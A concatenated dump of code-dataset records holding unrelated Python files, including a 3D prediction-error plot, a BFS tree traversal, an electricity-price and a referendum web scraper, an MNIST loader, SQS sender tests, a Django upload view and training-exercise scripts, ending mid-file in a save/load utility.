Its aim is to visualize the prediction error of a model trained on a\n    function :math:`f \\in \\mathbb{R}^2 \\\\rightarrow \\mathbb{R}^2` with input :math:`x \\in \\mathbb{R}^2` and output\n    :math:`y' \\in \\mathbb{R}^2`.\n\n    Args:\n        x_test:\n            (n,2)-array; list of all points ``x_test[i]`` :math:`\\in \\mathbb{R}^2` in the grid. (inputs for the MLP)\n        y_test:\n            (n,2)-array; list of all points ``y_test[i] = f(x_test[i])`` :math:`\\in \\mathbb{R}^2`, where ``f`` is the\n            function on which the MLP was trained\n        y_prediction:\n            (n,2)-array; list of all points ``y_prediction[i]`` :math:`\\in \\mathbb{R}^2`, where ``y_prediction[i]`` is the\n            prediction of the MLP trained on ``f`` for input ``x_test[i]``\n        name:\n            name of the function ``f`` on which the MLP was trained, used to name the file in which the visualization is\n            saved.\n    \"\"\"\n\n    # reshape sample-points\n    plot_dim_1 = [i[0] for i in x_test]\n    plot_dim_2 = [i[1] for i in x_test]\n\n    # calculate errors\n    errors = [np.linalg.norm(y_test[i]-y_prediction[i]) for i in range(y_test.shape[0])]\n    errors = np.array(errors)\n    plot_dim_3 = errors\n\n    # create and configure plot\n    fig = plt.figure()\n    ax = fig.add_subplot(111, projection='3d')\n    colmap = pylab.cm.ScalarMappable(cmap=pylab.cm.coolwarm)\n    colmap.set_array(plot_dim_3)\n    ax.scatter(plot_dim_1, plot_dim_2, plot_dim_3, c=pylab.cm.coolwarm(plot_dim_3/max(plot_dim_3)), marker='o')\n    fig.colorbar(colmap)\n    ax.set_xlabel('X')\n    ax.set_ylabel('Y')\n    ax.set_zlabel('prediction error')\n    plt.draw()\n    # save plot\n    # fig.savefig('plots/' + name + '_learned.png')\n    # show plot\n    plt.show()\n    plt.clf()\n","sub_path":"regression/plot3d.py","file_name":"plot3d.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"225901422","text":"# get content\nimport orbit_utils\nimport read_utils\nfrom orbit import Orbit\n\nstringlist = read_utils.getinput2(\"day6.txt\")\norbits = list()\nfor item in stringlist:\n    items = item.strip().split(\")\")\n    orbits.append(Orbit(items[0], items[1]))\n\ncount = orbit_utils.count_orbits(orbits)\nprint(\"Question 6A: Total orbits: \", count)\n\n# Question 6B\nsantaorbit = orbit_utils.find_orbiter(\"SAN\", orbits)\nsantapath = orbit_utils.find_path(santaorbit, orbits, list())\nyouorbit = orbit_utils.find_orbiter(\"YOU\", orbits)\nyoupath = orbit_utils.find_path(youorbit, orbits, list())\n\ncross_orbit = orbit_utils.find_crossing(santapath, youpath)\nsteps = youpath.index(cross_orbit) + santapath.index(cross_orbit)\n\nprint(\"Question 6B: Path from you to Santa: \", steps)\n","sub_path":"day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"641098136","text":"\"\"\"\nDefinition of TreeNode:\n\"\"\"\nclass TreeNode:\n    def __init__(self, val):\n        self.val = val\n        self.left, self.right = None, None\n\nfrom queue import Queue\n\nclass Solution:\n    \"\"\"\n    @param root: A Tree\n    @return: Level order a list of lists of integer\n    \"\"\"\n    def levelOrder(self, root):\n        if root is None:\n            return []\n\n        q = Queue()\n        q.put(root)\n\n        result = []\n        \n        while not q.empty(): # note the loop-termination condition\n            size = q.qsize()\n            level = [] # initialize the current level\n            for i in range(size):\n                node = q.get()\n                level.append(node.val)\n                if node.left:\n                    q.put(node.left)\n                if node.right:\n                    q.put(node.right)\n            print(level)\n            result.append(level)\n        return result\n\nif __name__ == '__main__':\n    node1 = TreeNode(1)\n    node2 = 
TreeNode(2)\n    node3 = TreeNode(3)\n    node4 = TreeNode(4)\n    node5 = TreeNode(5)\n    node6 = TreeNode(6)\n    node7 = TreeNode(7)\n    node1.left = node2\n    node1.right = node3\n    node2.left = node4\n    node2.right = node5\n    node3.left = node6\n    node3.right = node7\n    root = node1\n    print(Solution().levelOrder(root))\n","sub_path":"专题学习/BFS/BinaryTreeLevelOrderTraveral.py","file_name":"BinaryTreeLevelOrderTraveral.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"473763444","text":"### To Do's ###\n# - Ask where to store the query output\n#   By default, save it to the Desktop\n# Build a GUI to make selecting the info easier\n# auto-generate a report over the queried range\n\n\n# MODULES\nimport datetime\nfrom datetime import timedelta\nimport pandas as pd\nimport re\n\n# -------------------------------\n\n# FUNCTIONS\n\n\n# Turns the file with the nodes into a list\ndef txt_to_list(archivo_txt):\n    with open(archivo_txt) as archivo:\n        lineas = archivo.readlines()\n    lista_nodos = [linea.replace(\"\\n\", \"\") for linea in lineas]\n    return lista_nodos\n\n# This function converts the JSON content of the URL into a DataFrame\ndef url_into_df(url):\n    json = pd.read_json(url)[\"Resultados\"][0][\"Valores\"]\n    data_frame = pd.DataFrame(json)\n    return data_frame\n\n\n\n# ------------------------------------------------\n\n# Simply asks for the dates of the query period\ndia_i = int(input(\"Start day: \"))\nmes_i = int(input(\"Start month: \"))\nanio_i = int(input(\"Start year: \"))\n\ndia_f = int(input(\"End day: \"))\nmes_f = int(input(\"End month: \"))\nanio_f = int(input(\"End year: \"))\n\n# Select the system; lowercase input is converted to uppercase\nwhile True:\n    sistema = input(\"SIN, BCA or BCS: \").upper()\n    if sistema in (\"SIN\", \"BCA\", \"BCS\"):\n        break\n    else:\n        continue\n\n# Select whether it is MDA or MTR\nwhile True:\n    proceso = input(\"MDA or MTR: \").upper()\n    if proceso in (\"MDA\", \"MTR\"):\n        break\n    else:\n        continue\n\n# Select whether it is a P node or a Distributed node\nwhile True:\n    tipo_nodo = input(\"Node P or D: \").upper()\n    if tipo_nodo in (\"P\", \"D\"):\n        break\n    else:\n        continue\n\nif tipo_nodo == \"D\":\n    tipo_request = \"SWPEND\"\n\n    while True:\n        nodo = input(\"Enter the node name: \").upper().replace(\" \", \"-\")\n        if nodo in txt_to_list(\"nodosD.txt\"):\n            break\n        else:\n            print(\"Wrong node name, try again: \")\n            continue\nelse:\n    tipo_request = \"SWPML\"\n    while True:\n        nodo = input(\"Enter the NodoP: \").upper()\n        if re.match(\"^[0-9]{2}[A-Z]{3}-[0-9]{3}$\", nodo):\n            break\n        else:\n            print(\"The format must be ##XXX-###\")\n            continue\n\n# URL template for the queries\nurl_base = (\n    \"https://ws01.cenace.gob.mx:8082/\"\n    + tipo_request\n    + \"/SIM/\"\n    + sistema\n    + \"/\"\n    + proceso\n    + \"/\"\n    + nodo\n    + \"/{}/{}/{}/{}/{}/{}/\"\n    + \"JSON\"\n)\n\n# converts the values entered at the start into date format\nfecha_i = datetime.datetime(anio_i, mes_i, dia_i)\nfecha_f = datetime.datetime(anio_f, mes_f, dia_f)\n\n# returns the number of days between the start date and the end date\nplazo = (fecha_f - fecha_i).days + 1\n\n# if the period is shorter than a week, only 1 round is needed (the minimum query is 1 week)\nif plazo < 7:\n    rondas = 1\n    # if the period is longer than 7 days, rondas is set from the largest multiple of 7 in the period\nelse:\n    rondas = (plazo - plazo % 7) / 7\n\n    # this covers the days that do not fit into the rounds (e.g. if 
plazo = 31, rondas = 4, dias_restantes = 3)\ndias_restantes = plazo - rondas * 7\n\n# create \"start\" and \"end\" lists for the search ranges\nlista_1, lista_2 = list(), list()\n\nfor i in range(0, int(rondas)):\n    lista_1.append((fecha_i + timedelta(days=(7 * i))))\n    lista_2.append((fecha_i + timedelta(days=(7 * i)) + timedelta(days=6)))\n\n# account for the \"remaining days\" that fall outside the ranges\nlista_3 = list()\nfor i in range(0, int(dias_restantes)):\n    lista_3.append(fecha_i + timedelta(days=7 * rondas) + timedelta(days=i))\n\nlista_urls = list()\nfor i in range(0, int(rondas)):\n    lista_urls.append(\n        url_base.format(\n            lista_1[i].year,\n            f\"{lista_1[i].month:02}\",\n            f\"{lista_1[i].day:02}\",\n            lista_2[i].year,\n            f\"{lista_2[i].month:02}\",\n            f\"{lista_2[i].day:02}\",\n        )\n    )\n\nlista_urls.append(\n    url_base.format(\n        lista_3[0].year,\n        f\"{lista_3[0].month:02}\",\n        f\"{lista_3[0].day:02}\",\n        lista_3[-1].year,\n        f\"{lista_3[-1].month:02}\",\n        f\"{lista_3[-1].day:02}\",\n    )\n)\n\n# Append the DataFrame from each queried URL to an initially empty DataFrame\ndf = pd.DataFrame()\nfor urlz in lista_urls:\n    df_nuevo = url_into_df(urlz)\n    df = pd.concat((df, df_nuevo))\n\n\ndf.to_csv(\n    \"{} {}.{}.{} - {}.{}.{}.csv\".format(\n        nodo, anio_i, mes_i, dia_i, anio_f, mes_f, dia_f\n    )\n)\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"276925110","text":"import numpy as np\nimport pandas as pd\n\ndf = pd.read_csv('iris.data', header=None)\nx = df.iloc[0:100,[0, 1, 2, 3]].values\ny = df.iloc[0:100,4].values\ny = np.where(y=='Iris-setosa', 0, 1)\n\n\n# Section 4-3-2: prepare the dataset\n\nx_train = np.empty((80, 4))\nx_test = np.empty((20, 4))\ny_train = np.empty(80)\ny_test = np.empty(20)\n\n\nx_train[:40],x_train[40:] = x[:40],x[50:90]\nx_test[:10],x_test[10:] = x[40:50],x[90:100]\ny_train[:40],y_train[40:] = y[:40],y[50:90]\ny_test[:10],y_test[10:] = y[40:50],y[90:100]\n\n# Section 4-3-3: define the functions\n\ndef sigmoid(x):\n    return 1/(1+np.exp(-x))\n\ndef activation(x, w, b):\n    return sigmoid(np.dot(x, w)+b)\n\ndef update(x, y_train, w, b, eta): \n    y_pred = activation(x, w, b)\n    a = (y_pred - y_train) * y_pred * (1- y_pred)\n    for i in range(4):\n        w[i] -= eta * 1/float(len(y)) * np.sum(a*x[:,i])\n    b -= eta * 1/float(len(y))*np.sum(a)\n    return w, b\n\n\n# Section 4-3-4: run the training\n \nweights = np.ones(4)/10 \nbias = np.ones(1)/10 \neta=0.1\nfor _ in range(100): \n\tweights, bias = update(x_train, y_train, weights, bias, eta=0.1)\nprint('weights = ', weights, 'bias = ', bias)\n","sub_path":"F9373/ch04-3/iris.py","file_name":"iris.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"429279760","text":"from django.shortcuts import render\nimport json\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.http import Http404\nfrom django.shortcuts import render\nfrom h.models import *\nfrom firstApp.models import *\nfrom templates import *\nimport os\nimport uuid\n\n# Create your views here.\ndef change(request):\n    q=str(uuid.uuid4())\n\n    form=request.FILES[\"pic\"].content_type.split(\"/\")[request.FILES[\"pic\"].content_type.split(\"/\").__len__()-1]\n\n    while(os.path.exists(\"/Users/hossainaboutalebi/PycharmProjects/fazz/static/\"+q+\".\"+form)):\n        q=str(uuid.uuid4())\n\n    file = open(\"/Users/hossainaboutalebi/PycharmProjects/fazz/static/\"+q+\".\"+form, 'bw+')\n    
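    # build the public URL from the randomly generated UUID file name (host/port appear to be hard-coded for this dev setup)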
address=q+\".\"+form\n    request_file = request.FILES['pic']\n    print(request.FILES['pic'])\n    for chunck in request_file.chunks():\n        print(len(chunck))\n        file.write(chunck)\n\n    address=\"http://127.0.0.1:8000/static/\"+address\n    f=urls(id=q,Name=address);\n    f.save();\n    content={\"id\":q}\n    file.close()\n    return HttpResponse(json.dumps(content),content_type='application/json')\ndef fin(request,id):\n\n    iddd=id\n    a=urls.objects.filter(id=iddd)\n    v=a[0].Name\n    a=SubCategory.objects.all()\n    return render(request,\"FinalTaqhiir.html\",{\"image\":v,\"kitkat\":a})\n\ndef show(request):\n    a=SubCategory.objects.all()\n    return render(request,\"Taqhiirat.html\",{\"kitkat\":a})\n\n\ndef sub(request):\n\n    print(\"asdsad\")\n    f=Products(Name=request.POST[\"name\"],Price=request.POST[\"price\"],SubCategoryName=SubCategory.objects.filter(Name=request.POST[\"category\"])[0],picUrlProduct=request.POST[\"picId\"],Description=request.POST[\"description\"],Popularity=\"low\")\n    f.save();\n\n    return\n\ndef changePro(request):\n    kitkatPP=Products.objects.all()\n    a=SubCategory.objects.all()\n    return render(request,\"MahsoolChange.html\",{\"kitkat\":a,\"kitkatP\":kitkatPP})\n\ndef Trans(request):\n    kitkatPP=Products.objects.all()\n    return render(request,\"trakonesh.html\",{\"kitkatP\":kitkatPP})\n\n","sub_path":"fazz/firstApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"379364244","text":"# -*- coding: utf-8 -*-\n\"\"\"\nParameter definitions\n================\n\n\"\"\"\n\n# import standard libraries\nimport os\n\n# import third-party libraries\n\n# import my libraries\nimport color_space as cs\n\n# information\n__author__ = 'Toru Yoshihara'\n__copyright__ = 'Copyright (C) 2020 - Toru Yoshihara'\n__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'\n__maintainer__ = 'Toru Yoshihara'\n__email__ = 'toru.ver.11 at-sign gmail.com'\n\n__all__ = []\n\n\nL_SAMPLE_NUM_MAX = 8192\nH_SAMPLE_NUM_MAX = 8192\n\nGAMUT_BOUNDARY_LUT_LUMINANCE_SAMPLE = 1024\nGAMUT_BOUNDARY_LUT_HUE_SAMPLE = 1024\nCHROMA_MAP_DEGREE_SAMPLE_NUM = 1024\n\nDIPS_150_SAMPLE_ST_BT2020 = int(115/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\nDIPS_150_SAMPLE_ED_BT2020 = int(160/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\nDIPS_300_SAMPLE_ST_BT2020 = int(270/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\nDIPS_300_SAMPLE_ED_BT2020 = int(324/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\n\nDIPS_150_SAMPLE_ST_P3 = int(115/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\nDIPS_150_SAMPLE_ED_P3 = int(160/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\nDIPS_300_SAMPLE_ST_P3 = int(325/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\nDIPS_300_SAMPLE_ED_P3 = int(359/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\n\n# Looking at FIGURE A2-4 of BT.2407, it ends around 240°, so…\nL_FOCAL_240_INDEX_BT2020 = int(240/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\nL_FOCAL_240_INDEX_P3 = int(225/360 * GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\n\nC_FOCAL_MAX_VALUE = 5000\nLPF_WN_PARAM = 0.4 * (256/GAMUT_BOUNDARY_LUT_HUE_SAMPLE)\nLPF_NN_PARAM = int(4 * (GAMUT_BOUNDARY_LUT_HUE_SAMPLE/256) + 0.5)\n\n\ndef get_gamut_boundary_lut_name(\n        color_space_name=cs.BT709,\n        luminance_sample_num=GAMUT_BOUNDARY_LUT_LUMINANCE_SAMPLE,\n        hue_sample_num=GAMUT_BOUNDARY_LUT_HUE_SAMPLE):\n    name = f\"./luts/GamutBoundaryLUT_{color_space_name}_\"\\\n        + f\"L_{luminance_sample_num}_H_{hue_sample_num}.npy\"\n    return name\n\n\ndef get_chroma_map_lut_name(\n        outer_color_space_name=cs.BT2020,\n        inner_color_space_name=cs.BT709,\n        
luminance_sample_num=GAMUT_BOUNDARY_LUT_LUMINANCE_SAMPLE,\n hue_sample_num=GAMUT_BOUNDARY_LUT_HUE_SAMPLE,\n focal_type=\"Lfocal\"):\n name = f\"./luts/ChromaMap{focal_type}LUT_{outer_color_space_name}_to_\"\\\n + f\"{inner_color_space_name}_\"\\\n + f\"L_{luminance_sample_num}_H_{hue_sample_num}.npy\"\n return name\n\n\ndef get_l_cusp_name(\n outer_color_space_name=cs.BT2020,\n inner_color_space_name=cs.BT709,\n luminance_sample_num=GAMUT_BOUNDARY_LUT_LUMINANCE_SAMPLE,\n hue_sample_num=GAMUT_BOUNDARY_LUT_HUE_SAMPLE):\n name = f\"./luts/LCuspLUT_{outer_color_space_name}_to_\"\\\n + f\"{inner_color_space_name}_\"\\\n + f\"L_{luminance_sample_num}_H_{hue_sample_num}.npy\"\n return name\n\n\ndef get_focal_name(\n outer_color_space_name=cs.BT2020,\n inner_color_space_name=cs.BT709,\n luminance_sample_num=GAMUT_BOUNDARY_LUT_LUMINANCE_SAMPLE,\n hue_sample_num=GAMUT_BOUNDARY_LUT_HUE_SAMPLE,\n focal_type=\"Lfocal\"):\n name = f\"./luts/{focal_type}LUT_{outer_color_space_name}_to_\"\\\n + f\"{inner_color_space_name}_\"\\\n + f\"L_{luminance_sample_num}_H_{hue_sample_num}.npy\"\n return name\n\n\nif __name__ == '__main__':\n os.chdir(os.path.dirname(os.path.abspath(__file__)))\n print(get_gamut_boundary_lut_name(cs.BT709, 10, 20))\n","sub_path":"2020/020_explain_BT2407/bt2407_parameters.py","file_name":"bt2407_parameters.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"318698167","text":"import pytest\nfrom typecasts import Typecasts, casts\n\nfrom platonic.sqs.queue import SQSSender\nfrom platonic.sqs.queue.errors import SQSQueueURLNotSpecified\n\nOWN_TYPECASTS = Typecasts()\n\n\nclass MyStaticSender(SQSSender[int]):\n \"\"\"Initialize URL and internal type statically.\"\"\"\n\n url = 'foo'\n internal_type = bytes\n\n\nclass MyStaticTypecastsSender(SQSSender[int]):\n \"\"\"Initialize URL and internal type statically.\"\"\"\n\n url = 'foo'\n typecasts = OWN_TYPECASTS\n\n\nclass MyDynamicSender(SQSSender[int]):\n \"\"\"Will initialize URL and internal type dynamically.\"\"\"\n\n\ndef test_no_url():\n with pytest.raises(SQSQueueURLNotSpecified) as err:\n MyDynamicSender()\n\n assert 'sqs' in str(err.value) # noqa: WPS441\n\n\ndef test_initialize_typecasts():\n \"\"\"Typecasts.\"\"\"\n sender = MyStaticTypecastsSender(url='boo')\n assert sender.typecasts == OWN_TYPECASTS\n\n\ndef test_initialize_dynamically():\n \"\"\"Instantiate a sender class and provide the URL.\"\"\"\n my_casts = Typecasts()\n sender = MyDynamicSender(url='...', internal_type=bytes, typecasts=my_casts)\n assert sender.url == '...'\n assert sender.internal_type == bytes\n assert sender.typecasts == my_casts\n\n\ndef test_initialize_statically():\n \"\"\"Instantiate a sender class where URL is already specified.\"\"\"\n sender = MyStaticSender()\n assert sender.url == 'foo'\n assert sender.internal_type == bytes\n assert sender.typecasts == casts\n assert sender.client is not None\n","sub_path":"tests/test_queue/test_initialize.py","file_name":"test_initialize.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"97956481","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 30 16:17:51 2018\n\n@author: Camel\n\"\"\"\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport requests\nfrom selenium import webdriver\ndriver = 
webdriver.Chrome()\ndriver.get('http://referendum.2018.nat.gov.tw/pc/zh_TW/01/63000000100000000.html')\n\n\ndef getRef(url):\n    \"------------------- get region data -----------------\"\n    res = requests.get(url)\n    soup = BeautifulSoup(res.text, 'lxml')\n    dfs = pd.read_html(res.text)\n    \n    \"------------------- get vote data -----------------\"\n    votes = dfs[2]\n    votes.columns=votes.loc[1]\n    votes.drop([0,1,3,4] , inplace=True)\n    votes.reset_index(drop=True, inplace=True)\n\n    totalvotes = dfs[3]\n    totalvotes.columns = totalvotes.loc[0]\n    totalvotes.drop([0,2,3], inplace=True)\n    totalvotes.reset_index(drop=True, inplace=True)\n\n    mat = pd.concat([votes,totalvotes],axis=1)\n    area= soup.select_one('b').text\n    mat['voting district'] = area\n    writer = pd.ExcelWriter('output.xlsx')\n    mat.to_excel(writer,'Sheet2') \n    writer.save()\n    return mat\n\n\nsoup = BeautifulSoup(driver.page_source, 'lxml')\nall_countries_links = soup.select('div[id^=item] a')\n\ndomain = 'http://referendum.2018.nat.gov.tw/pc/zh_TW'\nresults=[]\n\"Enter the URL you want to query\"\ngetRef('http://referendum.2018.nat.gov.tw/pc/zh_TW/01/63000000200000000.html')\nfor ele in all_countries_links[0:13]:\n    try: # error-handling syntax\n        results.append(getRef(domain + ele.get('href').strip('.'))) # check whether the element has an href; if not, fall through to the except clause\n    except: # if the try block failed\n        print(domain + ele.get('href').strip('.')) # only the first link is problematic\n    else:\n        writer = pd.ExcelWriter('output1.xlsx')\n        for i in range(len(results)):\n            (results[i]).to_excel(writer,'District '+str(i+1)+' election results')\n        writer.save()","sub_path":"API_project7.py","file_name":"API_project7.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"477722702","text":"\n\n# class header\nclass _LION():\n\tdef __init__(self,): \n\t\tself.name = \"LION\"\n\t\tself.definitions = [u'a large wild animal of the cat family with yellowish-brown fur that lives in Africa and southern Asia: ', u'someone who is important, successful, or powerful: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_lion.py","file_name":"_lion.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"506909266","text":"import gzip\nimport logging\nimport os\nimport shutil\nimport tensorflow as tf\nfrom six.moves import urllib\n\nMNIST_MIRROR = 'http://yann.lecun.com/exdb/mnist/'\nFI = ['train-images-idx3-ubyte', 'train-labels-idx1-ubyte', 't10k-images-idx3-ubyte', 't10k-labels-idx1-ubyte']\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(\"MnistLoader\")\n\n\ndef download(download_links, zipped_paths):\n    for link, zipped_path in zip(download_links, zipped_paths):\n        logger.info('Downloading {} to {}'.format(link, zipped_path))\n        urllib.request.urlretrieve(link, zipped_path)\n\n\ndef extract(zipped_paths, extracted_paths):\n    for zipped_path, extracted_path in zip(zipped_paths, extracted_paths):\n        with gzip.open(zipped_path, 'rb') as file_in, tf.gfile.Open(extracted_path, 'wb') as file_out:\n            logger.info('Extracting {}'.format(zipped_path))\n            shutil.copyfileobj(file_in, file_out)\n\n\ndef remove(zipped_paths):\n    for zipped_path in zipped_paths:\n        logger.info('Removing {}'.format(zipped_path))\n        os.remove(zipped_path)\n\n\ndef decode_image_mlp(image):\n    image = tf.decode_raw(image, tf.uint8)\n    image = tf.cast(image, tf.float32)\n    image = 
tf.reshape(image, [784])\n    return image / 255.0\n\n\ndef decode_image_cnn(image):\n    image = tf.decode_raw(image, tf.uint8)\n    image = tf.cast(image, tf.float32)\n    image = tf.reshape(image, [28, 28, 1])\n    return image / 255.0\n\n\ndef decode_label(label):\n    label = tf.decode_raw(label, tf.uint8)\n    label = tf.reshape(label, [])\n    label = tf.one_hot(label, 10)\n    return label\n\n\ndef get_dataset(images_file, labels_file, decode_image, cores):\n    images = tf.data.FixedLengthRecordDataset(images_file, 28 * 28, header_bytes=16)\n    images = images.map(decode_image, num_parallel_calls=cores)\n\n    labels = tf.data.FixedLengthRecordDataset(labels_file, 1, header_bytes=8)\n    labels = labels.map(decode_label, num_parallel_calls=cores)\n    return tf.data.Dataset.zip((images, labels))\n\n\ndef get_inputs(images_file, labels_file, batch_size, buffer_size, prefetch, cores, decode_image):\n    dataset = get_dataset(images_file, labels_file, decode_image, cores)\n    dataset = dataset.shuffle(buffer_size)\n    dataset = dataset.batch(batch_size)\n    dataset = dataset.prefetch(prefetch)\n    iterator = dataset.make_initializable_iterator()\n    images, labels = iterator.get_next()\n    iterator_init_op = iterator.initializer\n\n    return images, labels, iterator_init_op\n\n\ndef get_inputs_mlp(images_file, labels_file, batch_size, prefetch, cores, buffer_size):\n    # pass the arguments in the order get_inputs expects: buffer_size before prefetch and cores\n    return get_inputs(images_file, labels_file, batch_size, buffer_size, prefetch, cores, decode_image_mlp)\n\n\ndef get_inputs_cnn(images_file, labels_file, batch_size, prefetch, cores, buffer_size):\n    return get_inputs(images_file, labels_file, batch_size, buffer_size, prefetch, cores, decode_image_cnn)\n\n\ndef download_missing_files(directory, files_to_download):\n    download_links = [os.path.join(MNIST_MIRROR, filename + '.gz') for filename in files_to_download]\n    zipped_paths = [os.path.join(directory, filename + '.gz') for filename in files_to_download]\n    extracted_paths = [os.path.join(directory, filename) for filename in files_to_download]\n    download(download_links, zipped_paths)\n    extract(zipped_paths, extracted_paths)\n    remove(zipped_paths)\n\n\ndef paget(directory, build_inputs, batch_size, prefetch, cores):\n    files = [os.path.join(directory, filename) for filename in FI]\n    files_to_download = [filename for filename in FI if not tf.gfile.Exists(os.path.join(directory, filename))]\n\n    if files_to_download:\n        download_missing_files(directory, files_to_download)\n\n    train_images, train_labels, train_iterator_init = build_inputs(files[0], files[1], batch_size, prefetch, cores, 60000)\n    test_images, test_labels, test_iterator_init = build_inputs(files[2], files[3], batch_size, prefetch, cores, 10000)\n\n    return train_images, train_labels, train_iterator_init, test_images, test_labels, test_iterator_init\n\n\ndef paget_mlp(directory, batch_size, prefetch, cores):\n    return paget(directory, get_inputs_mlp, batch_size, prefetch, cores)\n\n\ndef paget_cnn(directory, batch_size, prefetch, cores):\n    return paget(directory, get_inputs_cnn, batch_size, prefetch, cores)\n\n\nif __name__ == '__main__':\n    destination = '/Users/Piotr/Workspace/DataScience/pokedex/datasets'\n\n    # images, labels, iterator_init_op = get_inputs_mlp(extracted_paths[0], extracted_paths[1], 10, 60000)\n    # with tf.Session() as sess:\n    #     sess.run(iterator_init_op)\n    #     im, la = sess.run([images, labels])\n    #     print(im.shape)\n\n    x_train, y_train, init_train, x_test, y_test, init_test = paget_cnn(destination, 32, prefetch=2, cores=4)\n\n    with tf.Session() as sess:\n        sess.run([init_train, init_test])\n\n        
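        # with batch_size=32, the expected shapes are (32, 28, 28, 1) for images and (32, 10) for the one-hot labels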
print(sess.run(x_train).shape)\n        print(sess.run(y_train).shape)\n","sub_path":"datasets/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"108184103","text":"#!/usr/bin/env python\n# Author: youzibaby\n\nmoney = int(input(\"Enter your funds>>>\"))\nshop_list = '''\nEnter the number of the item you want to buy; enter q to quit.\n1 Iphone     6000 \n2 Mac book   12000 \n3 Bike       800 \n4 LV bag     2000\n'''\nshop_price = [0,[\"Iphone\",6000],[\"Mac book\",12000],[\"Bike\",800],[\"LV bag\",2000]]\nshop_car = []\nmenu_flag = False\n\nwhile menu_flag != True:\n    print(shop_list)\n    shop_lock = input(\"Enter the item number>>>\")\n    if shop_lock != \"q\":\n        shop = shop_price[int(shop_lock)]\n        if money > shop[1]:\n            shop_car.append(shop[0])\n            money = money - shop[1]\n        else:\n            print(\"Not enough money\")\n    else:\n        menu_flag = True\nelse:\n    if shop_car == []:\n        print(\"You did not buy anything.\")\n    else:\n        print(\"You bought the following items; balance: %d\"%money,\"\\n\",shop_car)\n\n\n\n\n\n","sub_path":"s14/day2/shopping1.py","file_name":"shopping1.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"504725358","text":"# -*- coding: utf-8 -*-\n\n#############################################\n#              dependencies                 #\n#############################################\n\nimport sys\nimport os.path\nimport numpy as np\n# others\nimport global_vars as g\n\n#############################################\n#                   code                    #\n#############################################\n\n\n\n#===========================================#\n# function save:\n#  in: int i_epoch, nb_epochs & save_frequency: used to know if it is time to save\n#      int i_simul: how many simulations to save (in terms of networks weights)\n#      array save_header: what to save first\n#  out: the save path if saved, else the boolean False \n#-------------------------------------------#\n# Saves the global_save into a file save_path.\n# The file is created if it doesn't exist.\n#-------------------------------------------#\n# What do we want about the weights?\n# --> to update the networks' weights\n# So we arrange the global_save into a list of weights,\n# ordered by increasing simulation number, then\n# by increasing id_network, so at each new simulation\n# we just have to pop the beginning of global_load into\n# the networks' weights\n#===========================================#\n\ndef save(save_path, i_epoch, nb_epochs, i_simul, save_frequency, save_header) :\n    if save_path is None:\n        return False\n    g.global_save = []\n    if (i_epoch%save_frequency) == 0 or (i_epoch == nb_epochs-1):    # We want to save at the frequency save_frequency\n                                                                     # and at the last epoch.\n        for i_net in range(1, g.nb_networks-1):    # Saving all networks.\n            g.networks_weights[i_simul][i_net] = g.networks[i_net].weights    # Updating the weights from the networks themselves for this simulation\n        g.global_save += save_header    # Erasing former save /!\\ need a copy\n        for simul in range(i_simul+1):    # we want to save the previous and the current simuls, so range(i_simul+1)\n            for net in range(g.nb_networks):\n                g.global_save.append( g.networks_weights[simul][net] )    # Update the current weights.\n\n        user_name = save_header[6][0]\n        game_name = save_header[6][1]\n        np.savez(save_path, *g.global_save)\n\n        return save_path\n    else:\n        return False\n\n\n    \n#===========================================#\n# function load:\n#  in: a path \".../file.npz\" to load\n#  out: the params needed to run 
